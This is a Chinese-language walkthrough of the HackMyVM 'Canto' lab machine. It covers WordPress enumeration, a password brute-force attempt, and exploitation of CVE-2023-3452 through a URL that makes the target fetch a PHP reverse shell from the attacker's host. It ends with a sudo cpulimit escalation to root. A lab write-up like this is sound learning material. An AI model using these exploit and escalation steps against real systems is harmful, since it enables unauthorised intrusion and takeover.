HMV Canto

信息收集

IP=192.168.0.194
nmap $IP

22/tcp open  ssh
80/tcp open  http

访问看看，是一个简单的页面，啥都没有。跑一波目录

gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,txt,html,bk,bak,zip,tar,gz,7z -t 50

/wp-content           (Status: 301) [Size: 319] [--> http://192.168.0.194/wp-content/]
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.0.194/wp-admin/]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.0.194/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.0.194/]
/wp-trackback.php     (Status: 200) [Size: 135]
/readme.html          (Status: 200) [Size: 7401]
/license.txt          (Status: 200) [Size: 19915]
/wp-login.php         (Status: 200) [Size: 5147]
/server-status        (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]

原来是一个 WP 啊。
果断扫描下

wpscan -e u,ap --url $IP

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.194/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.194/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.194/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.194/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.3 identified (Latest, released on 2024-05-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.194/index.php/feed/, <generator>https://wordpress.org/?v=6.5.3</generator>
 |  - http://192.168.0.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.5.3</generator>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.0.194/wp-content/themes/twentytwentyfour/
 | Latest Version: 1.1 (up to date)
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.0.194/wp-content/themes/twentytwentyfour/readme.txt
 | [!] Directory listing is enabled
 | Style URL: http://192.168.0.194/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.194/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] erik
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.0.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jun  5 15:26:58 2024
[+] Requests Done: 23
[+] Cached Requests: 36
[+] Data Sent: 6.22 KB
[+] Data Received: 70.141 KB
[+] Memory used: 263.816 MB
[+] Elapsed time: 00:00:02

找到了一个用户 erik，看看有没有弱密码

wpscan -U erik -P /usr/share/wordlists/seclists/Passwords/2023-200_most_used_passwords.txt --url $IP

跑了几个小字典，并没有。。跑了 rockyou 一会。也没找到。

经过 ta0 神提醒，有一个 CVE，去找了一圈 https://github.com/leoanggal1/CVE-2023-3452-PoC?tab=readme-ov-file 找到了这个。原理是真简单。
虽然有自动化脚本，但是还是想手动试试。

1. 下一个 reverse shell 的 php 文件 放到一个目录的 wp-admin 下，改名为 admin.php 记得 reverse shell 的 ip 和 port 要改成自己的。
2. 启动 pwncat pwncat-cs -lp 1234
3. 访问 http://$IP/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.0.30:8888
4. 就这。弹回来了。

(remote) www-data@canto:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

用户 erik 目录下，有一个 Note 目录，里面有一个日记，Day2 说他有一个 backup 目录，在/var/wordpress/backups下找到了，里面有个 txt 就是 erik 的密码。

ssh erik@$IP

sudo -l
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

翻了下 https://gtfobins.github.io/gtfobins/cpulimit/#shell

sudo cpulimit -l 100 -f /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

搞完 撒花 🎉

后续

经过大佬提醒，如果扫描的时候，用上了
wpscan --url http://192.168.3.155/ --plugins-detection aggressive -e u,ap
这个命令，就能扫描到插件了。这样就能找到漏洞了。